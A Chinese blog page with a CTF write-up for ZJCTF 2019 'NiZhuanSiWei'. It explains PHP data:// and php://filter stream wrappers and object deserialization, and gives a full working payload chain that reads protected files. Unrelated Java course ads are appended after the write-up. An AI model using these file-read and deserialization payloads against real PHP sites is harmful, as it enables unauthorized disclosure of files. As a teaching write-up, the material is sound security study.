CODING DevOps 高階架構師王煒入選木蘭開源社群首批導師

阿新 • • 發佈：2021-08-17

php協議流、序列化

[ZJCTF 2019]NiZhuanSiWei

讀題

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

大概可以知道要過兩個if條件。

這裡先了解一些php協議流的知識：

data:// 資料流

這個data流可以直接傳入程式碼被解析執行，類似php://input 輸入流

data: text/plain,輸入資料

data: text/plain;base64,輸入資料(base64加密)
php://filter 編碼流

檢視php檔案原始碼，而不是被解析。

原理是通過php編碼流base64編碼使得解析器無法解析。

php://filter/read=convert.base64-encode/resource=php檔案

所以第一個if條件繞過可以構造

?text=data:text/plain,welcome to the zjctf

接下來加入 file

?text=data:text/plain,welcome to the zjctf&file=php://filter/read=convert.base64.encode/resource=useless.php

讀取到useless.php

base64解碼後得到

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

也就是 Flag 這個類被當作字串的時候（例如echo $obj）會 tostring 一下子，而這裡 tostring 的功能就是返回 $this->file 的內容。

再看這一段

	include($file);  //useless.php
	$password = unserialize($password);
	echo $password;

如果 password 是一個 Flag 物件的話，那 echo $password 正好能執行tosring，通過賦值給裡面的 file ，就可以讀想要的檔案，然後注意一下這裡有一個反序列化。

所以構造一個序列化的Flag物件

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

這裡簡單說一下上面這串怎麼來的，數字 4、4、8其實就是它們各自後面字串的長度，1 呢就是說裡面有1個變數，其他的話應該還是挺好理解的，注意最後要分號 “;”。當然這裡 file 的型別是 public ，如果是 private 或 protected 的話，寫法又有些許差別。

不熟悉的話可以寫個php跑一下，線上php工具。

最後payload：

?text=data:text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

檢視原始碼看到flag

參考連結

php協議流 - Khazix - 部落格園 (cnblogs.com)

CODING DevOps 高階架構師王煒入選木蘭開源社群首批導師

軟體技術日新月異，GitHub 已經進化成為人類軟體的基因庫，碰到問題先去 GitHub 上尋找合適的解決方案已經變成了工程師處理問題的常見方法。開源和去中心化的社會協作逐漸成為社會發展的趨勢，開放的開源生態環境更

阿里P8架構師！深夜去騰訊大樓偷的這份“Java高階架構師（思維導圖）價值100k”

導語：對於攀登者來說，失掉往昔的足跡並不可惜，迷失了繼續前時的方向卻很危險。

小碼哥java從0到高階架構師

概念雙冒號 :: 為引用運算子，而它所在的表示式被稱為方法引用。如果Lambda要表達的函式方案已經存在於某個方法的實現中，那麼則可以通過雙冒號來引用該方法作為Lambda的替代者。

Java開發面試題！Java高階架構師成功的祕訣：先吃透這八部天書

Java開發面試題！Java高階架構師成功的祕訣：先吃透這八部天書但是，很多人需要進行更全面詳細的技術積累，能夠適用與平常工作，而這些是面試資料裡面不能一一描述的。

咕泡P6:Java網際網路高階架構師（SVIP漲薪班）

成為Java架構師首先你必須是一名Java高階開發工程師，熟練使用各種框架，並且能知道他們其中的原理。jvm虛擬機器原理、調優，懂得jvm能讓你寫出效能更好的程式碼;池技術，什麼物件池，連線池，執行緒池等等 Java構架

【高階Java架構師系統學習】四年Java面試遇到的問題整理

正文先問小夥伴們一個問題，登入難嗎？“登入有什麼難得？輸入使用者名稱和密碼，後臺檢索出來，校驗一下不就行了。”凡是這樣回答的小夥伴，你明顯就是產品思維，登入看似簡單，使用者名稱和密碼，後臺校驗一下，完